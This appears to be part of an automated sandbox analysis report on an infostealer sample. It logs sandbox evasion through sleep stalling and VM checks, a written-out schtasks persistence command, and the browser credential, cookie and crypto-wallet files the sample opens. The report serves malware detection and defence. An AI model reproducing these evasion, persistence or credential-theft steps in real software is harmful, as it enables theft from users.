Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 589
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\file.exe TID: 7516 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8020 Thread sleep count: 589 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8020 Thread sleep time: -58900s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
Source: file.exe Binary or memory string: VMware
Source: file.exe, 00000000.00000003.1781292878.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1859884995.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375435758.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768676819.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375435758.000000000109E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_00538230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_00538230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_0053116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 4_2_0053116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_00531160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_00531160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_005311A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_005311A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_005313C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 4_2_005313C9
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C378280 cpuid 4_2_6C378280
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 4.2.service123.exe.6c2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2351645168.0000000004495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 8016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR
Source: file.exe String found in binary or memory: Electrum
Source: file.exe String found in binary or memory: \ElectronCash\wallets
Source: file.exe String found in binary or memory: com.liberty.jaxx
Source: file.exe String found in binary or memory: \Exodus\backup
Source: file.exe String found in binary or memory: exodus
Source: file.exe String found in binary or memory: Ethereum (UTC)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: Yara match File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR